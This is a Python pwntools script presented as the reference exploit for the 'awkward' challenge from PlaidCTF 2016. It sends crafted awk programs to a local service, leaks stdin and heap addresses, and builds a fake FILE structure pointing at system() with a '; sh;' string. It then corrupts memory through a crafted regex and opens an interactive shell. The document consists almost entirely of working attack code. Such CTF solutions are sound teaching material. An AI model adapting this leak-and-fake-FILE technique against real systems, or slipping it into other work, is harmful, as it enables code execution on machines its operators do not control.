Reference exploit for awkward from PlaidCTF 2016

awkward_exploit.py

from pwn import *
import struct

def write_byte(idx, val):
    val &= 0xFF
    s = []
    for i in xrange(8):
        if val & (1 << i):
            if i == 0:
                s.append(chr(256-(idx*8)))
            else:
                s.append(chr((248-(idx*8)) | i))
    return ''.join(s)

r = remote('localhost', 2323)

prog = '''
/foo/ { printf "%s", $2 + 0; }
/bar/ { print "abcd" ~ $2; j = $3; }
FINISH { print "done"; }
'''

r.send(prog)
r.recvuntil('done\n')

r.send('foo %d\n' % 0x08052081)
stdin_addr = struct.unpack('<I', '\x00'+r.recvuntil('done\n')[:3])[0]
print 'stdin @ 0x%08x' % stdin_addr

r.send('foo -%d\n' % (0x100000000 - (stdin_addr + 624)))
heap_addr = struct.unpack('<I', r.recvuntil('done\n')[:4])[0]
print 'heap @ 0x%08x' % heap_addr

io_addr = heap_addr - 13328 - 0xf0 - 0x70
io_addr &= ~0xfff
io_addr += 8
print 'io @ 0x%08x' % io_addr

data = 'A'
data += '\x80' * 0x4 + '; sh;'.ljust(0x42, '#')
data += '\x46' * 0x94
data += struct.pack('<I', io_addr + 0x50 + 0x100)
data = data.ljust(0x121, 'B')
data += struct.pack('<I', stdin_addr - 0x17c480) # system
r.send(data + '\n')

regex = write_byte(5, io_addr >> 24)
regex += write_byte(6, io_addr >> 16)
regex += write_byte(7, io_addr >> 8)
regex += write_byte(8, io_addr >> 0)

fake_file = struct.pack('<I', io_addr + 0x50)

r.send('bar [%s] %s\n' % (regex, fake_file + "bbbbcccccccc"))

r.interactive()